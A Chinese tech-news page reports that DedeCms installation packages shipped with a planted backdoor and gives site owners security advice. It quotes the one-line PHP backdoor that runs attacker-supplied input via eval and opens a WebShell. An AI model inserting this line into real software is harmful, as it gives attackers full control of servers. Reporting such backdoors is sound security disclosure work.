您当前的位置:首页 > 电脑百科 > 程序开发 > 开源程序 > 织梦

织梦CMS建站系统被曝漏洞

时间:2019-08-02 10:47:28  来源:  作者:

最新消息,瑞星与 360 今日对外发布警示,称国内知名的 php 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

 

据第三方权威统计数据显示,目前约有 50 万网站使用该dedecms系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。

安全界人士分析发现,此类文件被植入一句后门代码“@eval (file_get_contents ('php://input'));”,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的 WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。

下面小熊优化的小编给出一个相关建议:

1、尽快转换系统,可以使用pageadmin、动易、wp这类保持续更新的cms系统、国内一些老牌的cms包括dedecms,phpcms、jtbc等已停止更新了,建议不要使用了。

2、尽量不要网上下载不知名的插件,尤其使用wp的网站,大多被黑的都是网上乱用插件导致的。

3、保持系统更新,官方更新的版本及时更新上,不要感觉现在功能够用了就不更新,有时候更新不仅仅是功能更新,也是安全上的更新。



Tags:织梦   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
列表页的完整调用 1.采集列表页模板2.将采集的模板文件放入模板文件夹下(D:phpstudy_proWWWscsw empletsscsw)3.用编辑器打开list_article.htm文件(这个是织梦默认模板路径)4....【详细内容】
2021-08-09  Tags: 织梦  点击:(89)  评论:(0)  加入收藏
断断续续学做web前端好些年了,学点皮毛,早年用织梦架设了一个网站,主要用来做图片和文字备忘。今天闲来无事打开网站逛了一会儿,又进入了网站后台,漫不经心的随手点击了在线更新,...【详细内容】
2021-07-27  Tags: 织梦  点击:(159)  评论:(0)  加入收藏
网站后台在生成html时,有时会提示:读取频道信息失败,无法进行后续操作!因为有文档使用了以前添加的内容模型和栏目,而内容模型又删除了,文档还在,生成全站或者生成文档时就会提示“...【详细内容】
2020-07-21  Tags: 织梦  点击:(150)  评论:(0)  加入收藏
梦本地后台如何进入数据库您的网站域名/ phpmyadmin /例如,本地主机后跟/ phpmyadmin /可以输入名为本地主机的网站的数据库。如何进入织梦网站数据库数据表?连接到远程数据库...【详细内容】
2020-04-21  Tags: 织梦  点击:(174)  评论:(0)  加入收藏
DEDEcms是目前市面上,比较简单方便的一款文章管理系统,使用人群较高,那么对于新手来说刚接触织梦首先要学会如何安装网站源码,今天借此机会就给大家分享,DEDE织梦网站安装+还原数...【详细内容】
2020-03-17  Tags: 织梦  点击:(189)  评论:(0)  加入收藏
最新消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上...【详细内容】
2019-08-02  Tags: 织梦  点击:(317)  评论:(0)  加入收藏
如果想要把一个栏目的所有文档复制到另一个栏目中如果没有好的办法就只能一个一个的重新建立,为了避免这种浪费时间的事,我们就在后台写一个批量复制的功能。下面是实现功能的...【详细内容】
2019-05-09  Tags: 织梦  点击:(432)  评论:(0)  加入收藏
▌简易百科推荐
列表页的完整调用 1.采集列表页模板2.将采集的模板文件放入模板文件夹下(D:phpstudy_proWWWscsw empletsscsw)3.用编辑器打开list_article.htm文件(这个是织梦默认模板路径)4....【详细内容】
2021-08-09    小花操生活  Tags:织梦CMS   点击:(89)  评论:(0)  加入收藏
断断续续学做web前端好些年了,学点皮毛,早年用织梦架设了一个网站,主要用来做图片和文字备忘。今天闲来无事打开网站逛了一会儿,又进入了网站后台,漫不经心的随手点击了在线更新,...【详细内容】
2021-07-27  蒙虎笔记    Tags:织梦   点击:(159)  评论:(0)  加入收藏
网站后台在生成html时,有时会提示:读取频道信息失败,无法进行后续操作!因为有文档使用了以前添加的内容模型和栏目,而内容模型又删除了,文档还在,生成全站或者生成文档时就会提示“...【详细内容】
2020-07-21      Tags:dedecms   点击:(150)  评论:(0)  加入收藏
梦本地后台如何进入数据库您的网站域名/ phpmyadmin /例如,本地主机后跟/ phpmyadmin /可以输入名为本地主机的网站的数据库。如何进入织梦网站数据库数据表?连接到远程数据库...【详细内容】
2020-04-21      Tags:织梦   点击:(174)  评论:(0)  加入收藏
DEDEcms是目前市面上,比较简单方便的一款文章管理系统,使用人群较高,那么对于新手来说刚接触织梦首先要学会如何安装网站源码,今天借此机会就给大家分享,DEDE织梦网站安装+还原数...【详细内容】
2020-03-17      Tags:DEDE,织梦   点击:(189)  评论:(0)  加入收藏
有网友在群里反馈,网站跳转到BC网站,我们发现网站竟然跳转到了违规网站上去了,网站在百度搜索出现:“百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!”的红...【详细内容】
2019-10-18      Tags:Dedecms   点击:(324)  评论:(0)  加入收藏
在用织梦做一些项目时,时常会碰到需要在当前页面调用顶级栏目名称的时候,织梦默认{dede:field name='typename' /} 可以获取当前栏目页上一级栏目的名称,而不是当前栏...【详细内容】
2019-09-25      Tags:dedecms   点击:(141)  评论:(0)  加入收藏
最新消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上...【详细内容】
2019-08-02      Tags:织梦   点击:(317)  评论:(0)  加入收藏
dedecms网站系统同一篇文章或图片集发布到多个不同的分类,也就是多个不同的栏目列表里面可以有相同的一篇文章,在很多时候这个功能都很好使的,dede的副栏目它既可以让一篇文档...【详细内容】
2019-06-25      Tags:   点击:(520)  评论:(0)  加入收藏
如果想要把一个栏目的所有文档复制到另一个栏目中如果没有好的办法就只能一个一个的重新建立,为了避免这种浪费时间的事,我们就在后台写一个批量复制的功能。下面是实现功能的...【详细内容】
2019-05-09      Tags:DEDE,织梦   点击:(432)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条